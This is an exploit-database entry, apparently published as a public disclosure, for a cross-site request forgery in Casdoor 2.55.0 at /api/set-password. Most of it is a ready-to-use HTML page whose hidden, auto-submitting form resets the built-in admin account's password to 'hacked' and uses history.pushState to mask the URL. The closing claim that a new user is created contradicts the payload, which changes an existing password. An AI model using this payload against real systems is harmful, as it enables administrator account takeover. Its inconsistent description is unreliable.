Casdoor 2.55.0 - Cross-Site Request Forgery (CSRF)
Author: Van Lam Nguyen
type: webapps
platform: multiple
port:
date_added: 2025-09-16
date_updated: 2025-09-17
verified: 0
codes: CVE-2023-34927
tags:
aliases:
screenshot_url:
application_url:
raw file: 52432.txt
# Exploit Title: Casdoor 2.55.0 - Cross-Site Request Forgery (CSRF)
# Application: Casdoor
# Version: 2.55.0
# Date: 09/10/2025
# Exploit Author: Van Lam Nguyen
# Facebook: vanlam1412
# Vendor Homepage: https://casdoor.org/
# Software Link: https://github.com/casdoor/casdoor/archive/refs/tags/v2.55.0.zip
# Tested on: Windows
# CVE : CVE-2023-34927 ( latest yet to be assigned)
Overview
==================================================
Casdoor v2.55.0 and below was discovered to contain a Cross-Site Request Forgery (CSRF) in the endpoint /api/set-password.
This vulnerability allows attackers to arbitrarily change the victim user's password via supplying a crafted URL.
Proof of Concept
==================================================
Made an unauthorized request to /api/set-password that bypassed the old password entry authentication step
<html>
<form action="http://localhost:8000/api/set-password" method="POST">
<input name='userOwner' value='built-in' type='hidden'>
<input name='userName' value='admin' type='hidden'>
<input name='newPassword' value='hacked' type='hidden'>
<input type=submit>
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</html>
If a user is logged into the Casdoor Webapp at time of execution, a new user will be created in the app with the following credentials
userOwner: built-in
userName: admin
newPassword: hacked